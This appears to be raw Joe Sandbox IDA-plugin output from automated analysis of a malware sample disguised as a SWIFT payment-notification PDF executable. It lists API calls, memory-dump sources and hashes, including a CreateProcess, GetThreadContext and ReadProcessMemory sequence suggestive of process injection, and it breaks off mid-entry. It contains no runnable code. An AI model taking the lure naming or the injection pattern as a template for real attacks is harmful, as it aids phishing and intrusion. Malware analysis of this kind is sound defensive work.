                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DesktopFolderFromListMallocPath
                                                                                                                              • String ID: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                              • API String ID: 2281215042-3339269206
                                                                                                                              • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                                                                              • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                                                                                              • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                                                                              • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                                                                                                              APIs
                                                                                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 04121AA3
                                                                                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04121B39
                                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04121B5B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.911854996.0000000004120000.00000040.00000020.00020000.00000000.sdmp, Offset: 04120000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_4120000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2438371351-0
                                                                                                                              • Opcode ID: ec40cea32e34b77dc66852b254e16eb814eeb5cb53dbe13a3b9b961a1e41453f
                                                                                                                              • Instruction ID: 9a5f51414b7f0a0772f35ed6be2b01c39b89818ddd7398a0b08abbaef2f8cacc
                                                                                                                              • Opcode Fuzzy Hash: ec40cea32e34b77dc66852b254e16eb814eeb5cb53dbe13a3b9b961a1e41453f
                                                                                                                              • Instruction Fuzzy Hash: 8B62FB30A14258DBEB24CFA4CD90BDEB376EF58300F1091A9D10DEB290E775AE91CB59
                                                                                                                              APIs
                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                                                                                                • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FileModuleNameOpen
                                                                                                                              • String ID: Include$\
                                                                                                                              • API String ID: 1506145535-3429789819
                                                                                                                              • Opcode ID: 5136d7da9c5bf0073b955d23f62714139c06d959485249d800a179de7f9c53a6
                                                                                                                              • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                                                                                              • Opcode Fuzzy Hash: 5136d7da9c5bf0073b955d23f62714139c06d959485249d800a179de7f9c53a6
                                                                                                                              • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E
                                                                                                                              APIs
                                                                                                                              • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                                                                                                • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe,0040F545,C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe,004A90E8,C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe,?,0040F545), ref: 0041013C
                                                                                                                                • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                                                                                • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                                                                                • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                                                                                • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: NamePath$Full$DesktopFileFolderFromListMallocOpen
                                                                                                                              • String ID: X$pWH
                                                                                                                              • API String ID: 819131735-941433119
                                                                                                                              • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                                                                              • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                                                                                              • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                                                                              • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                                                                                              APIs
                                                                                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 00431E34
                                                                                                                              • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00431E4C
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Temp$FileNamePath
                                                                                                                              • String ID: aut
                                                                                                                              • API String ID: 3285503233-3010740371
                                                                                                                              • Opcode ID: b5938d8baa24fa8bd6c9fd2b7d62684d192cfd552bf23c00763a11c17351aebe
                                                                                                                              • Instruction ID: 5bfe3c05d54daaccf8cad0b894ff223c4051d717a215ac0b7ff4b7edb98d8c84
                                                                                                                              • Opcode Fuzzy Hash: b5938d8baa24fa8bd6c9fd2b7d62684d192cfd552bf23c00763a11c17351aebe
                                                                                                                              • Instruction Fuzzy Hash: A8D05EB95403086BD324EB90ED4EFA9777CE744700F508AE9BE14461D1AAF06A54CBE9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: afcf258d4bd88d8ea756dbb23f6f5e28355c73968809c2117334dc7dbfffea7a
                                                                                                                              • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                                                                                              • Opcode Fuzzy Hash: afcf258d4bd88d8ea756dbb23f6f5e28355c73968809c2117334dc7dbfffea7a
                                                                                                                              • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                                                                                              APIs
                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Process$CurrentTerminate
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2429186680-0
                                                                                                                              • Opcode ID: 0f578ce52da9f9b4c714c296b9d78fbd636f242c945bc8d5a468c0e4c8bdb3ba
                                                                                                                              • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                                                                                              • Opcode Fuzzy Hash: 0f578ce52da9f9b4c714c296b9d78fbd636f242c945bc8d5a468c0e4c8bdb3ba
                                                                                                                              • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                                                                                              APIs
                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ByteCharMultiWide
                                                                                                                              • String ID: \5@
                                                                                                                              • API String ID: 626452242-1309314528
                                                                                                                              • Opcode ID: 3c281ecb90e54fc05e1b76c10a6f8db45d4c7a3d08a7a7321a3c24e4b5bd5798
                                                                                                                              • Instruction ID: cad64edcdcba5d9ec8cd2b6a335bbe98b4fe19d5968b0e5b1ca7a0aa7405deab
                                                                                                                              • Opcode Fuzzy Hash: 3c281ecb90e54fc05e1b76c10a6f8db45d4c7a3d08a7a7321a3c24e4b5bd5798
                                                                                                                              • Instruction Fuzzy Hash: 7801D6713402007FE714AB669C86F6B7B9CDB85725F14403ABA09DB2D1D9B1ED008365
                                                                                                                              APIs
                                                                                                                              • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000), ref: 00431DF5
                                                                                                                              • SetFileTime.KERNELBASE(00000000,?,00000000,?), ref: 00431E0D
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00431E14
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$CloseCreateHandleTime
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3397143404-0
                                                                                                                              • Opcode ID: 652760460537c60afb823e5992d28b38c9a9f9fa5742e3fc7e82df653fee10b1
                                                                                                                              • Instruction ID: 810a19753c0f2c4684b0bfc273ce87ce290b2c8a2af4acb4f2079771c7d617b3
                                                                                                                              • Opcode Fuzzy Hash: 652760460537c60afb823e5992d28b38c9a9f9fa5742e3fc7e82df653fee10b1
                                                                                                                              • Instruction Fuzzy Hash: 50E01275240214BBE6205B54DC4EF9F7758AB49B20F108615FF156B1D0C6B4695187A8
                                                                                                                              APIs
                                                                                                                              • GetStartupInfoW.KERNEL32(?,0048D0C8,00000058), ref: 00416464
                                                                                                                              • GetCommandLineW.KERNEL32 ref: 00416503
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CommandInfoLineStartup
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 582193876-0
                                                                                                                              • Opcode ID: 91c8eb4da3c7ff8427515efb3e276b6205f2762f3b55875094efa67c6b890b0c
                                                                                                                              • Instruction ID: ac7b2a7a110525a15761c18fac9a87cb5f7107ef6e751cb88c520a6366d35d41
                                                                                                                              • Opcode Fuzzy Hash: 91c8eb4da3c7ff8427515efb3e276b6205f2762f3b55875094efa67c6b890b0c
                                                                                                                              • Instruction Fuzzy Hash: AA317070940310AADB24BBB2A846BEE3674AF10759F11442FF505AA1D6EB7CC9C1CB9D
                                                                                                                              APIs
                                                                                                                              • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FreeInfoLibraryParametersSystem
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3403648963-0
                                                                                                                              • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                                                                              • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                                                                                              • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                                                                              • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                                                                                              APIs
                                                                                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                                                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFile
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 823142352-0
                                                                                                                              • Opcode ID: 51790c55969d4720e5bc0ceda432f1a204703ad37dc0e1a649077e2838033e58
                                                                                                                              • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                                                                                                                              • Opcode Fuzzy Hash: 51790c55969d4720e5bc0ceda432f1a204703ad37dc0e1a649077e2838033e58
                                                                                                                              • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                                                                                                                              APIs
                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000109,00000000,004229EE,00000000,00000109,?,004229EE,00000109,00000000,00000000), ref: 0041E1AE
                                                                                                                              • GetLastError.KERNEL32(?,004229EE,00000109,00000000,00000000), ref: 0041E1BB
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2976181284-0
                                                                                                                              • Opcode ID: 3e97f01922c1d7d6761d37e8c042bb033ea193a6ffb3200a7d889d99da883567
                                                                                                                              • Instruction ID: 3a52d99af4889aacde1065dfe3576237307748e1d7dc14bc5ca1c9168610e971
                                                                                                                              • Opcode Fuzzy Hash: 3e97f01922c1d7d6761d37e8c042bb033ea193a6ffb3200a7d889d99da883567
                                                                                                                              • Instruction Fuzzy Hash: 1F01F4366146517FC6111BBE9C089DB3B689F82334B210727FD31CB1E1DB38C88197A9
                                                                                                                              APIs
                                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000000,?,00417A5A,00000000), ref: 0041375E
                                                                                                                              • GetLastError.KERNEL32(00000000,?,00417A5A,00000000), ref: 00413770
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorFreeHeapLast
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 485612231-0
                                                                                                                              • Opcode ID: 58c48c5ad80d96b9acf5d244c9eac1548db561dba17a1218556d1964a8a8cdaa
                                                                                                                              • Instruction ID: 2371a508b7b006657431296420ef66ac3e5da02846a4165df707855177eb7138
                                                                                                                              • Opcode Fuzzy Hash: 58c48c5ad80d96b9acf5d244c9eac1548db561dba17a1218556d1964a8a8cdaa
                                                                                                                              • Instruction Fuzzy Hash: 7BE08C72004204ABCB212FB1EC08BDA3BA8AB40755F20447EF958C61A0DA7999C1C79C
                                                                                                                              APIs
                                                                                                                              • CloseHandle.KERNELBASE(00000000,00000000,00000109,?,004227A8,00000109), ref: 0041D7B4
                                                                                                                              • GetLastError.KERNEL32(?,004227A8,00000109), ref: 0041D7BE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseErrorHandleLast
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 918212764-0
                                                                                                                              • Opcode ID: 291c0696bda2c6d0ea991a4c2892309895d6b13f0ed428eaface8a755dd0f5b9
                                                                                                                              • Instruction ID: ee47189d5b6865b493d8c5c3ed26ce1959f7700021d2ad05630b2f7cd03a2383
